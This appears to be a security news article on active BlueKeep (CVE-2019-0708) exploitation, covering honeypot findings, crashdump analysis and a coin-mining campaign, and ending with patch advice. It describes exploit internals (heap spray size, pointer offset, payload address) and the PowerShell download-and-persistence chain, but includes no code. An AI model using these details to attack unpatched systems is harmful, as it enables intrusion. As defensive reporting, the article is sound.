Bluekeep is an exploit not unheard of. But, it is only in the recent times that an active exploitation of BlueKeep vulnerability has hit the headlines. Tracked as CVE-2019-0708, BlueKeep is a critical wormable remote code execution flaw in Remote Desktop Services patched by Microsoft in May 2019 Patch Tuesday Updates. Over 724,000 systems worldwide could be still unpatched and exposed for attack.
A security researcher named Kevin Beaumont built a worldwide honeypot network named BluePot using Azure Sentinel with Microsoft Sysmon. Although no signs of attack were observed initially, late October saw a steep increase in the crashing and rebooting of honeypots. An analysis of the crashdump from one of the honeypots in Germany was carried out by KryptosLogic. They analyzed the pool allocations with the pool tag
TSic, used by
IcaAllocateChannel in the Windows RDP driver
termdd.sys. The presence of thousands of allocations of size ‘0x170’ with
TSic tag suggested an abnormal behavior.
Looking back at the BlueKeep exploit, an allocation of the exact size ‘0x170’ is required to fill a memory hole in the freed channel structure
MS_T120 with a dangling pointer. Thousands of allocations also suggest the usage of heap spraying technique for exploitation. To gain Remote Code Execution, an attacker must hijack a pointer at offset 0x100 in the channel structure. This pointer indirectly links to a function which leads to the shellcode. The pointer dereferences the address
fffffa80`08807048 which leads to the exploit payload. The researchers were able to match these parameters with the recent attack sample, indicating a Bluekeep exploit. The attackers had used the same shellcode with the user mode egg from the BlueKeep Metasploit module.
The payload was an encoded PowerShell command which can be used to download another PowerShell command from the attacker’s server. The last stage included the execution of a malicious binary which is connected to a cryptocurrency miner.
Microsoft did its part by working closely with the researchers to investigate the RDP exploits. Microsoft points out that the customers of Microsoft Defender ATP were protected from early September well before the deployed honeypots were attacked. A number of critical signals were collected using the behavioral detection for the BlueKeep Metasploit module in Microsoft Defender ATP. A close examination of the C2 servers and behavioral aspects of recent attacks indicated a connection of the BlueKeep exploitation with an ongoing coin mining campaign. Countries like France, Russia, Italy, Spain, Ukraine, Germany, the United Kingdom, etc have been infected with the same coin miner payload.
According to Microsoft, the attacks could have started off as a port scan for machines with vulnerable RDP services. The next step was to run a PowerShell script using the BlueKeep Metasploit module to download and launch other encoded PowerShell scripts. Apart from retrieving the coin miner payload, the final scripts also create scheduled tasks to achieve persistence on the infected machines. The coin miner is finally saved as ‘C:\Windows\System32\spool\svchost.exe’ on the target.
There have been no reports of attacks involving malware or ransomware’s abusing BlueKeep. However, it is very likely that the attackers will sooner or later incorporate BlueKeep exploits in their modules only to leave behind devastating consequences.
- Windows 7
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2003
- Windows Vista
- Windows XP
An unauthenticated attacker who connects to the target system using RDP and sends specially crafted requests can execute arbitrary code on the system
Microsoft has released a patch for this vulnerability (CVE-2019-0708) in May 2019 Patch Tuesday Updates. It is strongly recommended to apply the patches for CVE-2019-0708 on all internet facing systems with RDP without any further delay.